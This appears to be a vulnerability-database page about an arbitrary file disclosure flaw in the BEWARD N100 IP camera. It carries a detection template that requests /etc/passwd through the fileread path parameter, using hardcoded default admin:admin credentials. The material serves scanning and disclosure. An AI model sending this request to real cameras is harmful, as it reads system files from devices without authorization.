beward-ipcamera-disclosure: BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure

日期: 2025-08-01 | 影响软件: BEWARD N100 H.264 VGA IP Camera | POC: 已公开

漏洞描述

The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API.

PoC代码[已公开]

id: beward-ipcamera-disclosure

info:
  name: BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure
  author: geeknik
  severity: high
  description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API.
  reference:
    - https://www.exploit-db.com/exploits/46320
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: iot,camera,disclosure,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd"

    headers:
      Authorization: "Basic YWRtaW46YWRtaW4="

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'root:[x*]:0:0:'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022024e40af59f81530b246407c1c2a9ee778b36e2607f23b265d809af205870ebe1022100ca088479b72546403e26dc5cae54a0e47a22169eb1baa3b222941709ee248fc1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐